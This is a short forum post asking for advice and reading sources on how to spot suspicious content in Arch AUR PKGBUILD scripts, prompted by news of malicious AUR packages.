TL;DR Got tips on specifics to be on the lookout for when scrutinizing a PKGBUILD script?
= = = = = = = = = = = = =
In reaction to the malicious AUR package news, deeper dives into PKGBUILD scripts become ever more imperative. I’ve often previewed PKGBUILDs before installing a new app, but confess that too much of what I’m reviewing goes over my head, leaving me feeling ill-prepared.
So instead, I’ve primarily been relying upon things like: the age of the app, # of contributors, responsiveness to PRs and open issues, star ratings, and the like. In other words, I’ve relied upon “social” screening rather than “technical” screening.
Having read through Arch and EOS wikis several times over the years (and google’d around a bit) it’s hard to find summary top-level explanations as to spotting specific things within the PKGBUILD scripts that ought to be of concern.
Anyone got sources/links worth reading to get smarter about this topic?